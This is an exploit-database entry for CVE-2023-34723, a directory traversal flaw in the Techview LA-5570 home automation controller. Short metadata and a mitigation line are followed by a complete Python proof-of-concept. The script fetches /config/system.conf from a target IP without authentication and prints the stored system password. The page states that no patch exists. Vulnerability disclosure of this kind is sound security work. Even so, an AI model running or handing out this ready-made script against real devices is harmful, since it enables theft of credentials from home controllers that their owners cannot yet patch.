Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities

vendor:

LA-5570 Wireless Gateway Home Automation Controller

by:

The Security Team

7.5

CVSS

HIGH

Multiple Vulnerabilities

CWE

Product Name: LA-5570 Wireless Gateway Home Automation Controller

Affected Version From: 1.0.19_T53

Affected Version To: 1.0.19_T53

Patch Exists: NO

Related CWE: CVE-2023-34723

CPE: a:techview:la-5570:1.0.19_T53

Metasploit:

Other Scripts:

Platforms Tested: MACOS/Linux

2023

Techview LA-5570 Wireless Gateway Home Automation Controller – Multiple Vulnerabilities

The exploit is a directory traversal vulnerability in the TechVIEW LA-5570 home automation controller. By accessing the system.conf file, an attacker can retrieve sensitive information, such as credentials.

Mitigation:

The vendor has not released a patch for this vulnerability. Users are advised to restrict access to the affected device and monitor for any unauthorized access.

Source

Exploit-DB raw data:

# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725

#!/opt/homebrew/bin/python3

import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def banner():
    if os.name == 'posix':
        clr_cmd = ('clear')
    elif os.name == 'nt':
        clr_cmd = ('cls')
    os.system(clr_cmd)
    print ("[+]****************************************************[+]")
    print (" | Author      : The Security Team                      |")
    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")
    print (" | Usage       : "+sys.argv[0]+" <target>              |")   
    print ("[+]****************************************************[+]")

def usage():
    print (f"Usage: {sys.argv[0]} <target>")

def main(target):
    domain = "http://"+target+"/config/system.conf"
    try:
        url = domain.strip()
        r = requests.get(url, verify=False, timeout=3)
        print ("[+] Retrieving credentials", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        if ("system_password" in r.text):
            data =  (r.text.split("\n"))
            print (f"\n{data[1]}")
        else:
            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
    except TimeoutError:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
    except KeyboardInterrupt:
        return
    except requests.exceptions.Timeout:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
        return
        
if __name__ == '__main__':
    if len(sys.argv)>1:
        banner()
        target = sys.argv[1]
        try:
            validate = ipaddress.ip_address(target)
            if (validate):
                main (target)
        except ValueError as e:
            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) 
    else:
        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)